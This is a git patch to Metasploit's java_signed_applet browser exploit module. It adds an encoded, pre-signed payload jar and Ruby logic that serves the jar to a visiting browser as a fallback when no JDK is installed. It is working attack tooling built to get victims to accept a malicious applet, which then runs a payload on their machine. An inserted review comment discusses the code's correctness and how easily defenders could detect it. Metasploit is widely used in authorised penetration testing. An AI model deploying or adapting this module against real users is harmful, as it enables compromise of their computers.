From 3ecabe1be922118caff7283958ed9d402a10a0d9 Mon Sep 17 00:00:00 2001 From: natron <> Date: Fri, 29 Jan 2010 19:47:40 +0000 Subject: [PATCH] Adds static signed jar and user messages letting them know. git-svn-id: file:///home/svn/framework3/trunk@8328 4d416f70-5f16-0410-b530-b9f4589650da --- data/exploits/java_signed_applet.jar | Bin 0 -> 5340 bytes .../multi/browser/java_signed_applet.rb | 65 +++++++++++------- 2 files changed, 42 insertions(+), 23 deletions(-) create mode 100644 data/exploits/java_signed_applet.jar 
diff --git a/data/exploits/java_signed_applet.jar b/data/exploits/java_signed_applet.jar new file mode 100644 index 0000000000000000000000000000000000000000..a1410036b5da477053f32257f2117d904947518f GIT binary patch literal 5340 zcma)AWmJ@F*Tx~F4^lFKQX(xeG=qXLLygoR(nt&pHH)ZF*Ydz18`&#SX&vV`T+LyWtE*>=w;q^MTkp|=Z7Sz|zPas;d zd`hZN{wK1kN>B(~>%kM~;_|*q_mdBrguT2;A50FjPwlhGt3g9h8NK#(kyEd&)?dXgaN9RXpW+ z7o@DpQ^!JyI<805$dGtCQccAomLl5Sj}~@ZLO1%9{ock|2KP~?Z7j!k8_|G!k&i5_ z80!E=g(A?M-H}sUnrh{hNGE^nQ_)9x?M?w<2iZ(8$o#>2Q;`RYkvErJv&1)zs+&Ri z9qDdUS{k>PO|}^;YdnSz@gG4S`P%=gE%tj!1^o>ioSN(W&$Xrb{RjH9w(@XU5YklC zVsY5|0QsZ$+n3&|H=(-i*XbJ?GY~!X3KQ`(H7Z%@b$s(HhOCemvQ+TO>y)OLdhp!B z)ZEl`PgT?ypw&vQ<=E>N2z)0yp*|p!5g`#5sH?-u`Jqg>l2Zi2!q=pjC0=>&X;ziE zp!Cx|8P&A0{?DKLzYO*dj`z2*5_gOEI);LBLSINxY<}jo#B*3mre^?Nj@}gON+7l( zm_A9#K3VyCVDC5OZ#z>jz?e{JKTi8DVV!>S4fUziV71u7*k!h{E6`I)T1t4;Biq^k zz0zfVRlxQH2shzD@}nz!l@G55S+1seO0TB8Vduflrw3*{38DLy7pO~@vv*jN`$H7- zoaLd=S>;EiL#hoWN0%7N$|Y>r-SEz2d0-v~-eDNGW9EdgmF3XeF+MC4t9hee+VRhM zzfqe?yYJ~Um69E{3a7nYT$`>}6&@ppAZ+kd!Y3|i0ig!_v3SKR%fKx_1erd#ojBh3 z6d6Kf|ESMu*wJ)Cj-kA8CpyI_;%3;`S1WrXZAn4<7t$yEkfEHYCQKpS)AxP6XSMc_ zxqx1po)adhbb6m?ffQd!mZX+Q;6Ug3th*ZDN(U`LUI)RIza#e@z>kNnJAAt7=)V2U zlD@tJrVVFl_v(X>ooWLC`gsZ`$(NwCwmJv3+V1U3uaj`s4tj$g#+C282efL$ns|}>;@&(mK;~U=cc|NsL)L^eOk*wpxN+vhk7mwDT6PlepTwoyf?F6)E#nNra-GH zZC~96Mk+@ydaw;v3$OWuX~>F5xnHdh%cQrzjuw$hz4&D00&15_rLLh z;+hX|D<=fZ-ozZ?@W9O0#L+QAOJ9vjgW{6hZUUiO7Z;}efVO>-=V{$LzPIW(NS5D1 zV%ib|?{37p)J&kr8k0_?4yP?)oKQ+8!M&4H+q5C}s%BHHxuuImqy0*En&a{6cl+5J zZF|biIH)c{&f3@dLViMzg<2?CiSNlzDYgaB!3jO}J*TZ&4Z~HE)caYIFpt%UUZ^#D zfumz6pqjh+?BF;-wk-w9yDCWtWZ#BppSCjlPz7+f$^^~xw7&~sWPwZ{C7aGLLF3Eu z1F>A7PM{>{WAihfb~}_EateRH7C&6}YYL4`F#lT1ZOTwkUc%z&c*e2z!FN52fhKw5 zd`_Xt>RbkQn$}vVl0!;yL6Y3-X1JSKf?Za+vu{>YhJBSukKctn1m}R;FDbF?jp;45 zrvcFkWjUrmAZr*+8%at`l$6LScYQt9G}=0l(wl}y=V^J6Gf|%wSV6l@{su>N)&f2f zPx?sy;D=O$`DR{ozo0%hP3`t-0z!}61RlO<+fF(|uTeC=K%Ul-zIy!8!U}>SfiWjZ zH1(RV+27ul5rFrlQ|m9<5p0(H7!2w;cpGFe_+E$ulU1r)Cybk2Q^c}gVtc@vexs6A 
zkz7G+aZ|o5wBrNoh;{C0ZH!sSNowZbR2f$YsEMPO9s?m_v-nhNV@(#i z{+nWkYC)TpyT<5dxpVmVlx83g)$vEA;($+gHH%`HkVn-Pkt}u^k`nXBb!@@Nu#D#t zE`E?qDG$Q-)krVM50+v6TBq>HVm2p_`oguyLH)p**BL=F{1W&LuOD)(WPAKf%@mBY zk}+h_$|26gm3Sv|c$W!%R+S2Lie=1c`bP0nJE(yFkta1UhX?qE0SKX^3SpKt=4#ue zHyiI1UruUMfDQ1Xh6%)!Jp~yib?H}`cW?gc7D9@)Cv(^ApvM1i>|p#ScHH|#6u2`Q zZSUap52k4AyE2T>Tt@P_FPSWe3y~+yY2hV)sbIUoPGL(JkxmEmR9cK1#+wY!Eti%} z(NM^4BhW+EB|7BiQg8;+8cYI|Qoa!2=JHWIFK(>vGc4lwTE3~?$oDnYw(8C3eum@m z#L2<7V{d+D)6cuF@E(r75IGhzyLmr=kz(JFMQmL>wJK7;!l}E3)r1!clyg|TsOjZ6ok&pqw62n>c78`Z&h=CJ+6{_Znz%a-HfP*2fKk48ViE%5}gBvD5Rp8PWJmJ?nO zXe~DN&`^yfTF48|0(NKvTi+kd17Y5TZ+9Q^;0;xxdK2xxCedpn_bs;##&WB`tdURy z5W+pqE+fhHLibw@Ca$i-#ny*o8e$Xp(f)0{tQg{jNt?_2a!-q{eexu@mBVO!!(H^v z6|Ybyv%_zYLLJ}#(b)wVz`M}M0$oxJ{%?h3BOF{h3eJZL1*Wvy9 z*d@CJ{t_R%Imks&V4XPvIwd(fxz`?{y}`_NB5a935AK%*9KmB-af}qjUjF4&&Yg0yRN)er=LFupDJcK zLYiG18rM&&b&GQ5c}X;z3WB(T3aowKP+sceCG?##=HYPc4iEdt*U)yBTxXCxngQ0Nir+dP~ zR%k!a1~J%JSo6(RkMzq<#kets$Wc|V&ftn$4RQa5idw5Gel+oFu^Zc@HSN2`jJF@= z*h_58ZJu$0wO$U70P>njj?OJ|z_I|%=l6YgZh=e0?F%eG*2G3BU`(fS9%0&a1=Ga) z98|pkGRaK=1$W=2rL_C%-?c>#YGS-w^s3;ro>}o`PP3~2k7}>0V@`Kcc#1pb6 zle!@BDcm!XT_3_RM{isOf8^XBm(;OzZ|Ll zaPO*qU504`84hLDrHW=QVH(53BkF!?SQ8b!9d?3iG4a;+Hfi2VNs@j&{X~kv6%R?= z;Aa-Wnc`@Bv(}cY%ZZn!5ly5&>ki}FmoIi+b&lK$7qUHvU**B5nzH9t*w@&~hmbjy ztGk2}tKmlh5rEM<3h-J)xQcJ(noh^L61jgEa+|~nk9b_*aNt2A?sMx7zJdC@onGtW;p2JN1UC{l3t%e8?Y#(gdE#2mhTK^Yxu+shHQ>DcNJq;VM=9nbQxq0DQ|<7Ond(@S zpefPwsb*zB?z+%|sj$Z9+?%)iB^-zoOV@nDK4NotUY}2m5GBxYmpo`iEEm_N+e7Eb z6V6dp3wKR79#$>haA0bKxY22VUvImGe|Agz>_%_qIl9$ZDITzht-Aegk5z(y&+349 z7PoYP$rExB_C5G&?#ab%jy+)J%}uo42NMm$keXpy-XihR?N4r*)#~y!ZG%yJLjA{Y z%R{hXW-7G~b`PHwcdh2+$fX5vuUDx9#Z_iF#{JZ+kW8y&r{pDEqA=VS$Asxb1g>*> zb0ojI-s8X(>-PjWI83Dft?Tjr$F6q|?&N?lv6Hh$p%7+H_W#g}URp|UDp~5wlzXH= zg_yE>D5S@_%`m%G-uF2nQawCG^4=Xf?(UrXAk@=Ka%uPFaCW75ox9Sfau;M7!(+e% z=4`k~Y5nX;wYQ4T)zKNxE4d_#|US)BPY?@WXDO$D#LX>F!rIxof zipMXRy1vNI03)!}>5Pp=!=X5#qF72B<>)CtY>Z&|tt=64YAAaSI~IW)C?uUuh8zW^ 
z^oPsqm5yuo3e|m#yVuWLW=WM+R%}rrdGMbXgV-TisG_7vLjcFW$t$;zz9G zF@cTYGN2&6r4<_GE-m)G5(1&0VaiB@$LKFq8=DE!QmV6jG-M+1KB-KvZ0T(TsNSaa^qCoME>7V2ged(zrK zskKW7@&juKgymCaaJi8`ZB9eGw0yF_^#Nu(Y|U*=zc#n_EqjZ%5q#Ixe^`xW>>)+_ z7S=CqOSJZ9md}YICJ3XJ?7JO!@VFD$(-{rTGBQoN0C_jJ;6tG)2Y4o;=zU{e~7NHOxwP_!@CMewS&w zj8zqp5{0TcZR;UHWOubM+0qiqdQ_43JFaA9cHCIV4rQjN00B0l2ucGlF@ysWuzD4z z&zTq zac@shzpAjxDW1|&ze+1ZGj3Xku!*}z1ruh5*Q%i3svAbV3xHH;v`BShj2dEw;B?5P z0(^y-X2Hqt`O|d&r&b+~XB&*J=QzYQchyyH0H|^Pvd4b+lz!P`{~Z6$Ec-jc@6O3T zBP?Ho{fY3WTLOpv9pU#`^OwW&SIAy#?0-eL_FMi1;x|G5YbgCIG_EE3-$&HH@BaN_ z`z6}{3VXuecmJz||2xv}rT%ph{uPKn{u9!_zZTV1@UK4?4i3TfD!4YK?oj=D`yUpk BaG3xA literal 0 HcmV?d00001 diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 4da6660e11..a32d5eb950 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -113,6 +113,16 @@ class Metasploit3 < Msf::Exploit::Remote # Currently doing all processing in on_request_uri. # If this is too slow, we can move applet generation up here. # + + @use_static = false + + if not @jvm_init + print_error + print_error "JVM not initialized. You must install the Java Development Kit, the rjb ruby gem, and set the $JAVA_HOME variable." + print_error "Falling back to static signed applet. This exploit will still work, but the CERTCN and APPLETNAME variables will be ignored." + print_error + @use_static = true + end super end 
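Review bot: The `if not @jvm_init` test runs before `super`, and if `@jvm_init` is only assigned by the Java mixin's `initialize` (which this `super` is what reaches), it will always be nil here and the module will silently take the static-jar path on every load, regardless of whether the JDK and rjb are present. Confirm where `@jvm_init` is set; if it comes from the mixin, move the whole `if not @jvm_init ... end` block, together with the `@use_static = false` default, below `super`. The fallback message could also tell the operator what they are trading for convenience: the bundled jar is a fixed, pre-signed artifact whose signer certificate and class names never change, so a line such as `print_error "The static jar is identical on every run; its signature and contents are an easy indicator for defenders."` would be worth adding. The enclosing `initialize` begins outside the hunk.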
@@ -374,43 +384,52 @@ public class #{datastore['APPLETNAME']} extends Applet end end - appletcode = get_code(cli) + if not @use_static + appletcode = get_code(cli) - print_status "Compiling applet classes..." - compile( appletcode['classnames'], appletcode['codefiles'] ) + print_status "Compiling applet classes..." + compile( appletcode['classnames'], appletcode['codefiles'] ) - print_status "Compile completed. Building jar file..." + print_status "Compile completed. Building jar file..." - unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" - @signedjar = "#{datastore['APPLETNAME']}.jar" + unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" + @signedjar = "#{datastore['APPLETNAME']}.jar" - build_jar( unsignedjar, - [ # Applet - datastore['APPLETNAME'] + ".class", - # PayloadX class - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", - # PayloadX StreamConnector for pure Java payload - datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) - - print_status "Jar built. Signing..." + build_jar( unsignedjar, + [ # Applet + datastore['APPLETNAME'] + ".class", + # PayloadX class + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", + # PayloadX StreamConnector for pure Java payload + datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) + + print_status "Jar built. Signing..." + + sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) + + print_status "Jar signed. Ready to send." + else + print_status "Using static, signed jar. Ready to send." + end - sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - - print_status "Jar signed. Ready to send." - # TODO: gzip data and parse in java send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end # load the jar file - if File.exists? 
File.join( datastore['JAVACACHE'], @signedjar ) - path = File.join( datastore['JAVACACHE'], @signedjar ) - fd = File.open( path, "rb" ) + if @use_static + path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) + elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) + path = File.join( datastore['JAVACACHE'], @signedjar ) + end + + if path + fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close end - + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )